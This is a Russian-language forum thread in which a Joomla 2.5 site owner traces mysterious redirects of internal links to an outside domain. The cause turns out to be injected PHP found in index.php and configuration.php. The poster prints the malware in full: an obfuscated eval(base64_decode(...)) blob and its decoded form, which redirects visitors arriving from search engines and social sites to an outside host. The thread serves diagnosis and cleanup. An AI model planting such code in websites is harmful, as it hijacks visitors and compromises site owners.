Форум Сайтостроение Веб-строительство

Joomla вместо внутренних ссылок переходы на внешний сайт

G
На сайте с 05.02.2012
Offline
73
gterkin
1272

Здравствуйте! Имеется такая проблема. CMS - Joomla! 2.5

Когда щелкаешь по пункту меню, или любой внутренней ссылки, осуществляется переход на внешний адрес "piopo.25u.com". При наведении курсора мыши на ссылку показывает нормальный внутренний адрес, а при клике переходит на этот адрес внешний.

Никто не знает, что за компонент может таким страдать? Трудность в том, что это происходит не всегда. Случайно выявил. Может раз в неделю включиться, или вообще долго не тревожить.

Карамба!
Saitoff
На сайте с 27.05.2011
Offline
71
Saitoff
#1

Клиента в студию.

wwwwww
На сайте с 29.04.2011
Offline
195
wwwwww
#2

PHP-Shell

http://kostin.su/2012/07/fucking-php-shell/

Видишь? Свободная подпись.
G
На сайте с 05.02.2012
Offline
73
gterkin
#3
wwwwww:
PHP-Shell
http://kostin.su/2012/07/fucking-php-shell/

ДА, очень на то похоже...

---------- Добавлено 14.08.2012 в 14:51 ----------

Хакерский код был под носом... я его сто раз видел в начале файлов index.php и configuration.php, однако почему то думал, что это и есть часть Joomla! кода. Кстати, по сравнению с приведенным в статье, его зашифровали. Выглядит он сейчас вот так:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9taW5rb2Yuc2VsbGNsYXNzaWNzLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

---------- Добавлено 14.08.2012 в 14:56 ----------

А если расшифровать то, что в скобках, вот что получается:

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://minkof.sellclassics.com/");

exit();

}

}

}

}

}

И снова ссылка на несуществующую страницу... Если переход с поисковиков.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий